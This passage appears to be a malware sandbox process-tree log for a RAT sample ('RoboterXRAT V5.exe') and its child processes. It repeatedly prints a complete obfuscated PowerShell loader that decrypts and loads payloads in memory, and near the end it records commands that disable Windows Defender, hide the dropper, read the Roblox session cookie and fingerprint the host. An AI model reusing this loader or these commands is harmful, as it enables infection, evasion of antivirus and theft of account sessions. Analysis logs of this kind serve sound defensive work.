        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2576
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        46⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        47⤵
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        47⤵
        
        PID:1132
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        47⤵
        
        PID:404
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        45⤵
        
        PID:2520
        
        C:\Windows\system32\net.exe
        
        net file
        46⤵
        
        PID:1524
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        47⤵
        
        PID:236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        45⤵
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        46⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        46⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        46⤵
        
        PID:2892
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        44⤵
        
        PID:2012
        
        C:\Windows\system32\net.exe
        
        net file
        45⤵
        
        PID:2384
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        46⤵
        
        PID:1748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        44⤵
        
        PID:2936
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        43⤵
        
        PID:2488
        
        C:\Windows\system32\net.exe
        
        net file
        44⤵
        
        PID:1348
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        45⤵
        
        PID:2712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        43⤵
        
        PID:2796
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        42⤵
        
        PID:2436
        
        C:\Windows\system32\net.exe
        
        net file
        43⤵
        
        PID:2856
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        44⤵
        
        PID:1004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        42⤵
        
        PID:2864
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        41⤵
        
        PID:2920
        
        C:\Windows\system32\net.exe
        
        net file
        42⤵
        
        PID:1484
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        43⤵
        
        PID:2964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        41⤵
        
        PID:2488
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        40⤵
        
        PID:612
        
        C:\Windows\system32\net.exe
        
        net file
        41⤵
        
        PID:3068
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        42⤵
        
        PID:2264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        41⤵
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        40⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        41⤵
        
        PID:932
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        42⤵
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        43⤵
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        44⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        45⤵
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        46⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        47⤵
        
        PID:1524
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        48⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        49⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        50⤵
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        51⤵
        
        PID:1348
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        52⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        53⤵
        
        PID:788
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        54⤵
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        55⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        56⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        57⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        57⤵
        
        PID:2500
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        57⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        56⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        56⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        55⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        55⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        54⤵
        
        PID:3028
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        54⤵
        
        PID:1352
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        53⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        53⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        52⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        52⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        51⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        51⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        50⤵
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        50⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        49⤵
        
        PID:2224
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        49⤵
        
        PID:2712
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        48⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        48⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        47⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        47⤵
        
        PID:1864
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        46⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        46⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        45⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        45⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        44⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        44⤵
        
        PID:324
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:2964
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        45⤵
        Views/modifies file attributes
        
        PID:2664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        45⤵
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        
        PID:944
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        45⤵
        
        PID:612
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        45⤵
        
        PID:2620
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:2256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        45⤵
